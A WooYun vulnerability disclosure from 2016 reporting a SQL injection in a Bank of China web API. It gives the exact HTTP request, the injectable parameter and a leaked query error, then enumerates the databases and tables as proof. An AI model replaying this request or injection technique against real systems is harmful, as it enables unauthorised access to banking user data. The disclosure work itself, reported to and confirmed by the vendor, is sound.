当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205199

漏洞标题:中国银行某站MySQL注射(涉及管理员密码/大量用户卡号信息)

相关厂商:中国银行

漏洞作者: Aasron

提交时间:2016-05-05 10:24

修复时间:2016-06-19 22:10

公开时间:2016-06-19 22:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

中国银行某站MySQL注射(涉及管理员密码/百万用户信息)

详细说明:

PUT /interFace/getAppUpdate.php HTTP/1.1
Host: open.boc.cn
Content-Type: application/json
Connection: close
Accept: application/json
User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 29
{"clientid":"399","type":"1"}


注入参数#clientid


正常返回内容

{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:\/\/open.boc.cn\/apps\/appdownload\/41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}


报错

<b>MySQL server error report:Array
(
[0] => Array
(
[message] => MySQL Query Error
)
[1] => Array
(
[sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods` where client_key=399'
)
[2] => Array
(
[error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
)
[3] => Array
(
[errno] => 1064
)
)

漏洞证明:

available databases [11]:
[*] bim
[*] container
[*] ec
[*] ezcis
[*] information_schema
[*] mysql
[*] ndbinfo
[*] performance_schema
[*] sap
[*] test
[*] ultrax


当前数据库:ec


+-------------------------------+
| aps_account_log |
| aps_ad |
| aps_ad_custom |
| aps_ad_position |
| aps_admin_action |
| aps_admin_log |
| aps_admin_message |
| aps_admin_user |
| aps_adsense |
| aps_affiliate_log |
| aps_agency |
| aps_apps |
| aps_apps_bak150321 |
| aps_apps_bak151205 |
| aps_apps_cat |
| aps_apps_relation |
| aps_area_region |
| aps_article |
| aps_article_cat |
| aps_article_cat_bak |
| aps_article_comment |
| aps_attribute |
| aps_auction_log |
| aps_auto_manage |
| aps_back_goods |
| aps_back_order |
| aps_bank_info |
| aps_banner |
| aps_bonus_type |
| aps_booking_goods |
| aps_brand |
| aps_card |
| aps_card_trans_audit |
| aps_cart |
| aps_cat_recommend |
| aps_category |
| aps_collect_goods |
| aps_comment |
| aps_crons |
| aps_custom_pads |
| aps_customs |
| aps_dcode |
| aps_delivery_goods |
| aps_delivery_order |
| aps_dic_h5_interface |
| aps_dic_paper_category |
| aps_dic_site_letter |
| aps_download_log |
| aps_email_list |
| aps_email_sendlist |
| aps_error_log |
| aps_exchange_goods |
| aps_failedlogin |
| aps_favourable_activity |
| aps_feedback |
| aps_friend_link |
| aps_general_bank |
| aps_general_interface |
| aps_goods |
| aps_goods_20141206 |
| aps_goods_activity |
| aps_goods_article |
| aps_goods_attr |
| aps_goods_bak150321 |
| aps_goods_bak151205 |
| aps_goods_cat |
| aps_goods_gallery |
| aps_goods_interface |
| aps_goods_interface_bak151205 |
| aps_goods_relation |
| aps_goods_type |
| aps_goods_whites |
| aps_group_goods |
| aps_interface |
| aps_interface0321 |
| aps_keywords |
| aps_link_goods |
| aps_log_conf |
| aps_log_data |
| aps_log_goods_download |
| aps_mail_templates |
| aps_manage_ip |
| aps_match_goods |
| aps_matchor |
| aps_member_price |
| aps_nav |
| aps_order_action |
| aps_order_goods |
| aps_order_info |
| aps_pack |
| aps_package_goods |
| aps_para_info |
| aps_para_type |
| aps_pay_log |
| aps_payment |
| aps_plugins |
| aps_poster |
| aps_poster_copy |
| aps_products |
| aps_reg_extend_info |
| aps_reg_fields |
| aps_region |
| aps_role |
| aps_searchengine |
| aps_sessions |
| aps_sessions_data |
| aps_shipping |
| aps_shipping_area |
| aps_shop_config |
| aps_snatch_log |
| aps_special_url |
| aps_stats |
| aps_suppliers |
| aps_tag |
| aps_template |
| aps_topic |
| aps_user_account |
| aps_user_address |
| aps_user_app |
| aps_user_bonus |
| aps_user_feed |
| aps_user_pictures |
| aps_user_pictures_copy |
| aps_user_rank |
| aps_user_test_account |
| aps_user_test_card |
| aps_user_trans_audit |
| aps_users |
| aps_users_bak |
| aps_users_bak150321 |
| aps_users_bak150321_copy |
| aps_users_copy |
| aps_validate_code |
| aps_validate_code_copy |
| aps_virtual_card |
| aps_volume_price |
| aps_vote |
| aps_vote_log |
| aps_vote_option |
| aps_wholesale |
+-------------------------------+


1.png


保证用户安全,不深入测试

修复方案:

过滤神马的

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-05 22:07

厂商回复:

感谢白帽子

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-05 10:37 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    大牛,收徒弟吗?

  2. 2016-05-05 10:59 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    银行。。。

  3. 2016-05-05 11:25 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)

    有钱

  4. 2016-05-06 08:17 | _Thorns ( 普通白帽子 | Rank:1744 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    看来表哥的神器已经写好了。